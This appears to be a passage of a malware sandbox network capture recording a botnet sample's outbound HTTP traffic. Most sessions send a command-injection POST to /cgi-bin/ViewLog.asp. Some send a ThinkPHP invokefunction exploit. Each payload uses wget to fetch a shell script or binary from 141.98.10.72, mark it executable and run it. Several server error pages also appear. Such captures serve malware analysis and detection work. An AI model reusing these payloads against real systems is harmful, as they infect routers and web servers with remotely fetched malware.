                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:30.808371067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.560131073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:03.835382938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:46.838308096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      621192.168.2.153283662.29.0.288080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.769524097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      622192.168.2.154943694.123.134.1538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.769710064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      623192.168.2.154045862.29.31.738080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.772378922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      624192.168.2.156032894.121.113.928080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.772923946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      625192.168.2.153989494.228.190.588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:21.094347000 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:21.300123930 CET484INHTTP/1.1 404 Not Found
                                                      Cache-Control: must-revalidate,no-cache,no-store
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Content-Length: 297
                                                      Server: Jetty(9.2.25.v20180606)
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 </title></head><body><h2>HTTP ERROR: 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr /><i><small>Powered by Jetty://</small></i></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      626192.168.2.155361288.221.34.1880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:21.250099897 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:21.367502928 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:21 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:21 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 62 64 37 64 64 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 31 26 23 34 36 3b 66 30 39 36 32 66 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1bd7dd17&#46;1707899421&#46;f0962fd</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      627192.168.2.153776085.10.151.1418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:21.496530056 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:21.701271057 CET626INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 431
                                                      Date: Wed, 14 Feb 2024 08:30:21 GMT
                                                      Keep-Alive: timeout=5
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      628192.168.2.155957494.122.3.1268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:21.540848017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      629192.168.2.154697494.120.235.1458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:21.542365074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      630192.168.2.155631295.101.214.3580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:21.588243008 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:21.808964968 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:21 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:21 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 65 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 31 26 23 34 36 3b 31 36 33 63 66 31 39 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2e0b1502&#46;1707899421&#46;163cf193</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      631192.168.2.154398062.74.158.1648080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:21.761744022 CET300OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.
                                                      Feb 14, 2024 09:30:22.048152924 CET498INHTTP/1.1 401 Unauthorized
                                                      WWW-Authenticate: Basic realm="Protected"
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      632192.168.2.1551284119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:22.043843985 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:52Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      633192.168.2.1551414119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:22.743155956 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:53Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      634192.168.2.155409295.164.206.338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.190150976 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.309032917 CET1260INHTTP/1.1 400 Bad Request
                                                      Server: squid/3.5.20
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:30:23 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 3560
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Vary: Accept-Language
                                                      Content-Language: en
                                                      X-Cache: MISS from ezproxies.com
                                                      X-Cache-Lookup: NONE from ezproxies.com:8080
                                                      Via: 1.1 ezproxies.com (squid/3.5.20)
                                                      Connection: close
